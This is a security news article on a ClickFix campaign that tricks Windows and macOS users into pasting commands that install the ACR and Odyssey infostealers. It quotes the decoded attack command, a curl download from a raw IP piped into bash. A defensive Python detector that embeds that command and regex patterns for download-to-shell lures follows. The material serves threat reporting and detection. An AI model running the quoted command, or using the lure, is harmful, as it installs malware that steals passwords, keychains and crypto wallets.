New ClickFix Attack Targeting Windows and macOS Users to Deploy Infostealer Malware


A growing social engineering technique called ClickFix has emerged as one of the most successful methods for distributing malware in recent months.

The attack tricks users into copying a command from a web page and running it themselves in their operating system's command-line interface (a terminal on macOS, the Run dialog or PowerShell on Windows), which ultimately installs information-stealing malware.

The technique has proven effective because no malicious attachment or download ever passes through email security, and the browser-side part of the lure does nothing more than place text on the clipboard. The malicious activity only begins when the victim pastes and executes that text outside the browser, where web-content scanning has no visibility.

The attack typically begins when users search for cracked software through search engines. Cybercriminals create fake landing pages hosted on trusted platforms like Google Colab, Drive, Sites, and Groups to avoid being blocked by security systems.

These pages act as initial contact points that redirect victims based on their operating system. Windows users receive the ACR stealer, while macOS users are redirected to pages that deploy the Odyssey infostealer.

Intel471 security researchers identified this campaign in June 2025 during proactive malware hunting operations.


The investigation revealed that threat actors were successfully targeting both major operating systems through a single infrastructure.

Infection chain (Source - Intel471)

What makes this attack particularly concerning is that the pasted command fetches its payload over the network and pipes it straight into an interpreter rather than saving it as a file first. File-based antivirus scanning therefore has nothing to inspect at that stage; the activity is visible mainly to tooling that records process creation and command lines.

Infection Mechanism and Technical Execution

For Windows users, the attack chain guides victims through several redirection points before reaching a MEGA file hosting page containing a password-protected ZIP archive.

Inside this archive sits the ACR stealer disguised as setup.exe. The malware not only steals credentials and personal data but also serves as a loader, installing additional threats such as SharkClipper, a cryptocurrency clipboard hijacker.

Fake Cloudflare security check which prompts users to run a ClickFix command (Source - Intel471)

macOS users encounter a different approach built around a fake Cloudflare security check page. When a user clicks to copy what appears to be a verification string, the page actually places a Base64-encoded shell command on the clipboard, and the "verification" instructions tell the user to paste it into Terminal.

Once decoded, the command is:

curl -s http://45.135.232.33/droberto39774 | nohup bash

This command silently downloads and runs the Odyssey stealer, which harvests passwords, cookies, cryptocurrency wallets, Apple Notes, Keychain entries, and system data, then compresses everything into out.zip for exfiltration.
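The decode-and-inspect step above is the one a security team can automate for anything a web page asks a user to paste. The following is an added example, not code from the article or from Intel471: it peels Base64 layers off a clipboard string (both a bare Base64 blob and an `echo <b64> | base64 -d | sh` wrapper), then checks the decoded text against a few indicators typical of ClickFix lures (a download piped into a shell, `nohup`, a raw-IP URL). The indicator patterns and the sample clipboard contents are constructed for the example; the sample is the article's decoded command re-encoded the way the fake verification page would hand it over.

```python
import base64
import binascii
import re
from typing import Dict, List

# Constructed sample: the decoded command quoted in the article, re-encoded as
# the bare Base64 string the fake Cloudflare page copies to the clipboard.
ARTICLE_COMMAND = "curl -s http://45.135.232.33/droberto39774 | nohup bash"
SAMPLE_CLIPBOARD = base64.b64encode(ARTICLE_COMMAND.encode()).decode()

# Indicator patterns (assumed for this example) for text a web page asks a user to run.
INDICATORS = {
    # curl/wget output piped, optionally via nohup, into sh/bash/zsh
    "download_piped_to_shell": re.compile(
        r"\b(curl|wget)\b[^|;&]*\|\s*(nohup\s+)?(ba|z|)sh\b"),
    # detaching from the terminal so the stealer survives the window closing
    "nohup_detach": re.compile(r"\bnohup\b"),
    # payload host given as a bare IP address rather than a domain
    "raw_ip_url": re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}\b"),
    # a further decode stage inside the decoded command
    "base64_decode_stage": re.compile(r"base64\s+(-d|--decode|-D)"),
}

B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
WRAPPER_RE = re.compile(
    r"echo\s+['\"]?([A-Za-z0-9+/=]{16,})['\"]?\s*\|\s*base64\s+(?:-d|--decode|-D)")


def decode_layers(text: str, max_depth: int = 3) -> List[str]:
    """Strip up to max_depth Base64 layers. Returns outermost text first."""
    chain = [text.strip()]
    for _ in range(max_depth):
        candidate = chain[-1]
        # Pull the blob out of an `echo <b64> | base64 -d | sh` wrapper if present.
        m = WRAPPER_RE.search(candidate)
        blob = m.group(1) if m else candidate
        if not B64_RE.match(blob) or len(blob) % 4:
            break  # plain text (or not valid Base64): nothing more to peel
        try:
            decoded = base64.b64decode(blob, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            break  # looked like Base64 but is not a decodable text command
        chain.append(decoded.strip())
    return chain


def analyze_clipboard(text: str) -> Dict[str, object]:
    """Decode a pasted string and report which ClickFix indicators fire."""
    chain = decode_layers(text)
    final = chain[-1]
    hits = [name for name, rx in INDICATORS.items() if rx.search(final)]
    if "download_piped_to_shell" in hits:
        verdict = "block"
    elif hits:
        verdict = "review"
    else:
        verdict = "clean"
    return {
        "decoded": final,
        "layers": len(chain) - 1,
        "indicators": hits,
        "verdict": verdict,
    }


if __name__ == "__main__":
    for sample in (SAMPLE_CLIPBOARD,
                   'echo "' + SAMPLE_CLIPBOARD + '" | base64 -d | bash',
                   "just a verification code"):
        print(analyze_clipboard(sample))
```

The same function can sit behind an endpoint-agent hook or a paste-event handler: feed it whatever the user is about to run, and treat a `block` verdict as a reason to stop and alert rather than to execute.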
